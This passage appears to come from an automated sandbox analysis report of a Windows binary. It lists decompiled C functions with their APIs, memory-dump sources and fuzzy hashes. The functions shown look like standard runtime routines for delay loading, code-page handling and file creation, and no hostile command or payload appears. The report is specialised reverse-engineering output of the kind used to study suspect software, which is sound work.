                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: cbwM,
                                                                                                                • API String ID: 1269201914-1933750459
                                                                                                                • Opcode ID: 80e32fdb06d297e74d047a9854089d1c967ad64df15515e9b7c5616508355430
                                                                                                                • Instruction ID: 89c37ec8ca6aded4cc754144b78742830eb900e314f6d2efbbfe33c0eb9157aa
                                                                                                                • Opcode Fuzzy Hash: 80e32fdb06d297e74d047a9854089d1c967ad64df15515e9b7c5616508355430
                                                                                                                • Instruction Fuzzy Hash: 1AA011822A8203BC302822222E03C3A020CC0E0F20330A82FF202A0280A8800E822032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2C34, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2C34() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef6b4); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2c17
                                                                                                                0x00ed2c1c
                                                                                                                0x00ed2c23

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2C1C
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: cbwM,
                                                                                                                • API String ID: 1269201914-1933750459
                                                                                                                • Opcode ID: 46f0f4535a8b26c10a02f9926c25f2f7c3b98d71a8e6c525d12f06f9f5137997
                                                                                                                • Instruction ID: 89c37ec8ca6aded4cc754144b78742830eb900e314f6d2efbbfe33c0eb9157aa
                                                                                                                • Opcode Fuzzy Hash: 46f0f4535a8b26c10a02f9926c25f2f7c3b98d71a8e6c525d12f06f9f5137997
                                                                                                                • Instruction Fuzzy Hash: 1AA011822A8203BC302822222E03C3A020CC0E0F20330A82FF202A0280A8800E822032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2C0F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2C0F() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef6b4); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2c17
                                                                                                                0x00ed2c1c
                                                                                                                0x00ed2c23

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2C1C
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: cbwM,
                                                                                                                • API String ID: 1269201914-1933750459
                                                                                                                • Opcode ID: 5970ac835d92db117393c27edf632c695827109d3b5b271e07de93c1937c4415
                                                                                                                • Instruction ID: f56ca77401bcb0080e3e464f2461bc5cec3d6f17c446a296f8348e116022f98d
                                                                                                                • Opcode Fuzzy Hash: 5970ac835d92db117393c27edf632c695827109d3b5b271e07de93c1937c4415
                                                                                                                • Instruction Fuzzy Hash: 2EA011822A82023C302822222E03C3A022CC0E0F20330A02FF200B0282A8800E8220B2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EE0420, Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E00EE0420(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed char _t62;
				signed int _t63;
				signed char* _t72;
				signed char* _t73;
				int _t78;
				signed int _t81;
				signed char* _t82;
				short* _t83;
				int _t87;
				signed char _t88;
				signed int _t89;
				signed int _t91;
				signed int _t92;
				int _t94;
				int _t95;
				intOrPtr _t98;
				signed int _t99;

				_t48 =  *0xef1558; // 0xf529bb33
				_v8 = _t48 ^ _t99;
				_t98 = _a8;
				_t78 = E00EDFFEC(__eflags, _a4);
				if(_t78 != 0) {
					_t94 = 0;
					__eflags = 0;
					_t81 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0xef1718)) - _t78;
						if( *((intOrPtr*)(_t51 + 0xef1718)) == _t78) {
							break;
						}
						_t81 = _t81 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t81;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t78 - 0xfde8;
							if(_t78 == 0xfde8) {
								L23:
							} else {
								__eflags = _t78 - 0xfde9;
								if(_t78 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t78,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0xf25d34 - _t94; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E00EE005F(_t98);
												goto L37;
											}
										} else {
											E00ED4440(_t94, _t98 + 0x18, _t94, 0x101);
											 *(_t98 + 4) = _t78;
											 *(_t98 + 0x21c) = _t94;
											_t78 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t98 + 8) = _t94;
											} else {
												__eflags = _v22;
												_t72 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t88 = _t72[1];
														__eflags = _t88;
														if(_t88 == 0) {
															goto L16;
														}
														_t91 = _t88 & 0x000000ff;
														_t89 =  *_t72 & 0x000000ff;
														while(1) {
															__eflags = _t89 - _t91;
															if(_t89 > _t91) {
																break;
															}
															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
															_t89 = _t89 + 1;
															__eflags = _t89;
														}
														_t72 =  &(_t72[2]);
														__eflags =  *_t72;
														if( *_t72 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t73 = _t98 + 0x1a;
												_t87 = 0xfe;
												do {
													 *_t73 =  *_t73 | 0x00000008;
													_t73 =  &(_t73[1]);
													_t87 = _t87 - 1;
													__eflags = _t87;
												} while (_t87 != 0);
												 *(_t98 + 0x21c) = E00EDFFAD( *(_t98 + 4));
												 *(_t98 + 8) = _t78;
											}
											_t95 = _t98 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E00EE00C4(_t78, _t91, _t95, _t98, _t98); // executed
											L37:
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E00ED4440(_t94, _t98 + 0x18, _t94, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0xef1728;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t82 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t82[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t92 =  *_t82 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t92 - _t63;
									if(_t92 > _t63) {
										break;
									}
									__eflags = _t92 - 0x100;
									if(_t92 < 0x100) {
										_t31 = _t94 + 0xef1710; // 0x8040201
										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
										_t92 = _t92 + 1;
										__eflags = _t92;
										_t63 = _t82[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t82 =  &(_t82[2]);
								__eflags =  *_t82;
								if( *_t82 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t94 = _t94 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t94 - 4;
					} while (_t94 < 4);
					 *(_t98 + 4) = _t78;
					 *(_t98 + 8) = 1;
					 *(_t98 + 0x21c) = E00EDFFAD(_t78);
					_t83 = _t98 + 0xc;
					_t91 = _v36 + 0xef171c;
					_t95 = 6;
					do {
						_t58 =  *_t91;
						_t91 = _t91 + 2;
						 *_t83 = _t58;
						_t83 = _t83 + 2;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					goto L36;
				} else {
					E00EE005F(_t98);
				}
				L39:
				return E00ED3C6A(_v8 ^ _t99);
			}






























                                                                                                                0x00ee0428
                                                                                                                0x00ee042f
                                                                                                                0x00ee0437
                                                                                                                0x00ee043f
                                                                                                                0x00ee0444
                                                                                                                0x00ee0455
                                                                                                                0x00ee0455
                                                                                                                0x00ee0457
                                                                                                                0x00ee0459
                                                                                                                0x00ee045b
                                                                                                                0x00ee045e
                                                                                                                0x00ee045e
                                                                                                                0x00ee0464
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ee046a
                                                                                                                0x00ee046b
                                                                                                                0x00ee046e
                                                                                                                0x00ee0471
                                                                                                                0x00ee0476
                                                                                                                0x00000000
                                                                                                                0x00ee0478
                                                                                                                0x00ee0478
                                                                                                                0x00ee047e
                                                                                                                0x00ee054c
                                                                                                                0x00ee0484
                                                                                                                0x00ee0484
                                                                                                                0x00ee048a
                                                                                                                0x00000000
                                                                                                                0x00ee0490
                                                                                                                0x00ee0494
                                                                                                                0x00ee049a
                                                                                                                0x00ee049c
                                                                                                                0x00000000
                                                                                                                0x00ee04a2
                                                                                                                0x00ee04a7
                                                                                                                0x00ee04ad
                                                                                                                0x00ee04af
                                                                                                                0x00ee0539
                                                                                                                0x00ee053f
                                                                                                                0x00000000
                                                                                                                0x00ee0541
                                                                                                                0x00ee0542
                                                                                                                0x00000000
                                                                                                                0x00ee0542
                                                                                                                0x00ee04b5
                                                                                                                0x00ee04bf
                                                                                                                0x00ee04c4
                                                                                                                0x00ee04cc
                                                                                                                0x00ee04d2
                                                                                                                0x00ee04d3
                                                                                                                0x00ee04d6
                                                                                                                0x00ee0529
                                                                                                                0x00ee04d8
                                                                                                                0x00ee04d8
                                                                                                                0x00ee04dc
                                                                                                                0x00ee04df
                                                                                                                0x00ee04e1
                                                                                                                0x00ee04e1
                                                                                                                0x00ee04e4
                                                                                                                0x00ee04e6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ee04e8
                                                                                                                0x00ee04eb
                                                                                                                0x00ee04f6
                                                                                                                0x00ee04f6
                                                                                                                0x00ee04f8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ee04f0
                                                                                                                0x00ee04f5
                                                                                                                0x00ee04f5
                                                                                                                0x00ee04f5
                                                                                                                0x00ee04fa
                                                                                                                0x00ee04fd
                                                                                                                0x00ee0500
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ee0500
                                                                                                                0x00ee04e1
                                                                                                                0x00ee0502
                                                                                                                0x00ee0502
                                                                                                                0x00ee0505
                                                                                                                0x00ee050a
                                                                                                                0x00ee050a
                                                                                                                0x00ee050d
                                                                                                                0x00ee050e
                                                                                                                0x00ee050e
                                                                                                                0x00ee050e
                                                                                                                0x00ee051e
                                                                                                                0x00ee0524
                                                                                                                0x00ee0524
                                                                                                                0x00ee052e
                                                                                                                0x00ee0531
                                                                                                                0x00ee0532
                                                                                                                0x00ee0533
                                                                                                                0x00ee05f7
                                                                                                                0x00ee05f8
                                                                                                                0x00ee05fd
                                                                                                                0x00ee05fe
                                                                                                                0x00ee05fe
                                                                                                                0x00ee04af
                                                                                                                0x00ee049c
                                                                                                                0x00ee048a
                                                                                                                0x00ee047e
                                                                                                                0x00000000
                                                                                                                0x00ee0600
                                                                                                                0x00ee055e
                                                                                                                0x00ee0566
                                                                                                                0x00ee0566
                                                                                                                0x00ee056a
                                                                                                                0x00ee056d
                                                                                                                0x00ee0573
                                                                                                                0x00ee0576
                                                                                                                0x00ee0576
                                                                                                                0x00ee0579
                                                                                                                0x00ee057b
                                                                                                                0x00ee057d
                                                                                                                0x00ee057d
                                                                                                                0x00ee0580
                                                                                                                0x00ee0582
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ee0584
                                                                                                                0x00ee0587
                                                                                                                0x00ee05a3
                                                                                                                0x00ee05a3
                                                                                                                0x00ee05a5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ee058c
                                                                                                                0x00ee0592
                                                                                                                0x00ee0594
                                                                                                                0x00ee059a
                                                                                                                0x00ee059e
                                                                                                                0x00ee059e
                                                                                                                0x00ee059f
                                                                                                                0x00000000
                                                                                                                0x00ee059f
                                                                                                                0x00000000
                                                                                                                0x00ee0592
                                                                                                                0x00ee05a7
                                                                                                                0x00ee05aa
                                                                                                                0x00ee05ad
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ee05ad
                                                                                                                0x00ee05af
                                                                                                                0x00ee05af
                                                                                                                0x00ee05b2
                                                                                                                0x00ee05b3
                                                                                                                0x00ee05b6
                                                                                                                0x00ee05b9
                                                                                                                0x00ee05b9
                                                                                                                0x00ee05bf
                                                                                                                0x00ee05c2
                                                                                                                0x00ee05d1
                                                                                                                0x00ee05da
                                                                                                                0x00ee05df
                                                                                                                0x00ee05e5
                                                                                                                0x00ee05e6
                                                                                                                0x00ee05e6
                                                                                                                0x00ee05e9
                                                                                                                0x00ee05ec
                                                                                                                0x00ee05ef
                                                                                                                0x00ee05f2
                                                                                                                0x00ee05f2
                                                                                                                0x00ee05f2
                                                                                                                0x00000000
                                                                                                                0x00ee0446
                                                                                                                0x00ee0447
                                                                                                                0x00ee044d
                                                                                                                0x00ee0601
                                                                                                                0x00ee0610

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00EDFFEC: GetOEMCP.KERNEL32(00000000,?,?,00EE0275,?), ref: 00EE0017
                                                                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00EE02BA,?,00000000), ref: 00EE0494
                                                                                                                • GetCPInfo.KERNEL32(00000000,00EE02BA,?,?,?,00EE02BA,?,00000000), ref: 00EE04A7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CodeInfoPageValid
                                                                                                                • String ID:
                                                                                                                • API String ID: 546120528-0
                                                                                                                • Opcode ID: 26ccbbc154bf481a597a00bd3ac2fa6359257d2760e102f05f1fc4598302d4db
                                                                                                                • Instruction ID: 9f1d60da82b5fbee956ff13fba0d9e42e46c47c62d583acacaab8cd662eb3b31
                                                                                                                • Opcode Fuzzy Hash: 26ccbbc154bf481a597a00bd3ac2fa6359257d2760e102f05f1fc4598302d4db
                                                                                                                • Instruction Fuzzy Hash: 25513B7090028D9FDB308F73C4806BBBBE5EF41314F14646ED096AB291D6B4958ACF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EE0258, Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E00EE0258(signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				char _v16;
				void* __esi;
				void* __ebp;
				char _t31;
				signed int _t36;
				char _t40;
				intOrPtr _t44;
				char _t45;
				signed int _t51;
				void* _t64;
				void* _t70;
				signed int _t75;
				void* _t81;

				_t81 = __eflags;
				_v8 = E00EDE015(__ebx, __ecx, __edx);
				E00EE037E(__ebx, __ecx, __edx, __edi);
				_t31 = E00EDFFEC(_t81, _a4);
				_v16 = _t31;
				_t57 =  *(_v8 + 0x48);
				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_push(__edi);
				_t70 = E00EDD5E4(_t57, 0x220);
				_t51 = __ebx | 0xffffffff;
				__eflags = _t70;
				if(__eflags == 0) {
					L5:
					_t75 = _t51;
					goto L6;
				} else {
					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
					 *_t70 =  *_t70 & 0x00000000; // executed
					_t36 = E00EE0420(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
					_t75 = _t36;
					__eflags = _t75 - _t51;
					if(_t75 != _t51) {
						__eflags = _a8;
						if(_a8 == 0) {
							E00EDD35F();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t51 == 1;
						if(_t51 == 1) {
							_t45 = _v8;
							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0xef1a10;
							if( *((intOrPtr*)(_t45 + 0x48)) != 0xef1a10) {
								E00EDD5AA( *((intOrPtr*)(_t45 + 0x48)));
							}
						}
						 *_t70 = 1;
						_t64 = _t70;
						_t70 = 0;
						 *(_v8 + 0x48) = _t64;
						_t40 = _v8;
						__eflags =  *(_t40 + 0x350) & 0x00000002;
						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0xef1c90 & 0x00000001;
							if(( *0xef1c90 & 0x00000001) == 0) {
								_v16 =  &_v8;
								E00EDFEC1(5,  &_v16);
								__eflags = _a8;
								if(_a8 != 0) {
									_t44 =  *0xef1c30; // 0x31a23f8
									 *0xef1704 = _t44;
								}
							}
						}
						L6:
						E00EDD5AA(_t70);
						return _t75;
					} else {
						 *((intOrPtr*)(E00EDD9BD())) = 0x16;
						goto L5;
					}
				}
			}

















                                                                                                                0x00ee0258
                                                                                                                0x00ee0265
                                                                                                                0x00ee0268
                                                                                                                0x00ee0270
                                                                                                                0x00ee0279
                                                                                                                0x00ee027c
                                                                                                                0x00ee0282
                                                                                                                0x00000000
                                                                                                                0x00ee0284
                                                                                                                0x00ee0288
                                                                                                                0x00ee028a
                                                                                                                0x00ee0295
                                                                                                                0x00ee0297
                                                                                                                0x00ee029b
                                                                                                                0x00ee029d
                                                                                                                0x00ee02cd
                                                                                                                0x00ee02cd
                                                                                                                0x00000000
                                                                                                                0x00ee029f
                                                                                                                0x00ee02ac
                                                                                                                0x00ee02b2
                                                                                                                0x00ee02b5
                                                                                                                0x00ee02ba
                                                                                                                0x00ee02be
                                                                                                                0x00ee02c0
                                                                                                                0x00ee02df
                                                                                                                0x00ee02e3
                                                                                                                0x00ee02e5
                                                                                                                0x00ee02e5
                                                                                                                0x00ee02f0
                                                                                                                0x00ee02f4
                                                                                                                0x00ee02f5
                                                                                                                0x00ee02f7
                                                                                                                0x00ee02fa
                                                                                                                0x00ee0301
                                                                                                                0x00ee0306
                                                                                                                0x00ee030b
                                                                                                                0x00ee0301
                                                                                                                0x00ee030c
                                                                                                                0x00ee0312
                                                                                                                0x00ee0317
                                                                                                                0x00ee0319
                                                                                                                0x00ee031c
                                                                                                                0x00ee031f
                                                                                                                0x00ee0326
                                                                                                                0x00ee0328
                                                                                                                0x00ee032f
                                                                                                                0x00ee0334
                                                                                                                0x00ee033d
                                                                                                                0x00ee0342
                                                                                                                0x00ee0348
                                                                                                                0x00ee034a
                                                                                                                0x00ee034f
                                                                                                                0x00ee034f
                                                                                                                0x00ee0348
                                                                                                                0x00ee032f
                                                                                                                0x00ee02cf
                                                                                                                0x00ee02d0
                                                                                                                0x00000000
                                                                                                                0x00ee02c2
                                                                                                                0x00ee02c7
                                                                                                                0x00000000
                                                                                                                0x00ee02c7
                                                                                                                0x00ee02c0

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00EDE015: GetLastError.KERNEL32(?,?,00ED8DFC,?,?,?,00ED8877,00000050), ref: 00EDE019
                                                                                                                  • Part of subcall function 00EDE015: _free.LIBCMT ref: 00EDE04C
                                                                                                                  • Part of subcall function 00EDE015: SetLastError.KERNEL32(00000000), ref: 00EDE08D
                                                                                                                  • Part of subcall function 00EDE015: _abort.LIBCMT ref: 00EDE093
                                                                                                                  • Part of subcall function 00EE037E: _abort.LIBCMT ref: 00EE03B0
                                                                                                                  • Part of subcall function 00EE037E: _free.LIBCMT ref: 00EE03E4
                                                                                                                  • Part of subcall function 00EDFFEC: GetOEMCP.KERNEL32(00000000,?,?,00EE0275,?), ref: 00EE0017
                                                                                                                • _free.LIBCMT ref: 00EE02D0
                                                                                                                • _free.LIBCMT ref: 00EE0306
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorLast_abort
                                                                                                                • String ID:
                                                                                                                • API String ID: 2991157371-0
                                                                                                                • Opcode ID: 48b8263d1ac5ef4242e8d10e5943849d79352a82103af24498ea5a8766ba89ec
                                                                                                                • Instruction ID: 5cd42744eedb519dbc4d2d2ccbb20b1229bcfba6de8647130b2b56c468550866
                                                                                                                • Opcode Fuzzy Hash: 48b8263d1ac5ef4242e8d10e5943849d79352a82103af24498ea5a8766ba89ec
                                                                                                                • Instruction Fuzzy Hash: 1131F83190414CEFDB10EBA6D445BAD77E5EF44324F21109AF504BB3A2DBB29D81CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC1BCE, Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00EC1BCE(void* __ecx, short _a4, WCHAR* _a4104, signed char _a4108) {
				long _v0;
				signed char _t34;
				signed int _t36;
				void* _t37;
				signed char _t46;
				struct _SECURITY_ATTRIBUTES* _t47;
				long _t56;
				void* _t59;
				long _t63;

				E00ED3370();
				_t46 = _a4108;
				_t34 = _t46 >> 0x00000001 & 0x00000001;
				_t59 = __ecx;
				if((_t46 & 0x00000010) != 0 ||  *((char*)(__ecx + 0x1d)) != 0) {
					_t63 = 1;
					__eflags = 1;
				} else {
					_t63 = 0;
				}
				 *(_t59 + 0x18) = _t46;
				_v0 = ((0 | _t34 == 0x00000000) - 0x00000001 & 0x80000000) + 0xc0000000;
				_t36 =  *(E00EC36A8(_t34, _a4104)) & 0x0000ffff;
				if(_t36 == 0x2e || _t36 == 0x20) {
					if((_t46 & 0x00000020) != 0) {
						goto L8;
					} else {
						 *(_t59 + 4) =  *(_t59 + 4) | 0xffffffff;
						_t47 = 0;
						_t56 = _v0;
					}
				} else {
					L8:
					_t56 = _v0;
					_t47 = 0;
					__eflags = 0;
					_t37 = CreateFileW(_a4104, _t56, _t63, 0, 2, 0, 0); // executed
					 *(_t59 + 4) = _t37;
				}
				if( *(_t59 + 4) == 0xffffffff && E00EC3399(_a4104,  &_a4, 0x800) != 0) {
					 *(_t59 + 4) = CreateFileW( &_a4, _t56, _t63, _t47, 2, _t47, _t47);
				}
				 *((char*)(_t59 + 0x12)) = 1;
				 *(_t59 + 0xc) = _t47;
				 *(_t59 + 0x10) = _t47;
				return E00EC674F(_t59 + 0x1e, _a4104, 0x800) & 0xffffff00 |  *(_t59 + 4) != 0xffffffff;
			}












                                                                                                                0x00ec1bd3
                                                                                                                0x00ec1bd9
                                                                                                                0x00ec1be6
                                                                                                                0x00ec1be8
                                                                                                                0x00ec1bee
                                                                                                                0x00ec1bfc
                                                                                                                0x00ec1bfc
                                                                                                                0x00ec1bf6
                                                                                                                0x00ec1bf6
                                                                                                                0x00ec1bf6
                                                                                                                0x00ec1c06
                                                                                                                0x00ec1c1b
                                                                                                                0x00ec1c24
                                                                                                                0x00ec1c2a
                                                                                                                0x00ec1c34
                                                                                                                0x00000000
                                                                                                                0x00ec1c36
                                                                                                                0x00ec1c36
                                                                                                                0x00ec1c3a
                                                                                                                0x00ec1c3c
                                                                                                                0x00ec1c3c
                                                                                                                0x00ec1c42
                                                                                                                0x00ec1c42
                                                                                                                0x00ec1c42
                                                                                                                0x00ec1c46
                                                                                                                0x00ec1c46
                                                                                                                0x00ec1c56
                                                                                                                0x00ec1c5c
                                                                                                                0x00ec1c5c
                                                                                                                0x00ec1c63
                                                                                                                0x00ec1c91
                                                                                                                0x00ec1c91
                                                                                                                0x00ec1ca3
                                                                                                                0x00ec1ca8
                                                                                                                0x00ec1cab
                                                                                                                0x00ec1cc4

                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?), ref: 00EC1C56
                                                                                                                • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800), ref: 00EC1C8B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 1a9d7add333f5cedcdb21f0c85ddf4238865252563033bf490b63600f2ea03eb
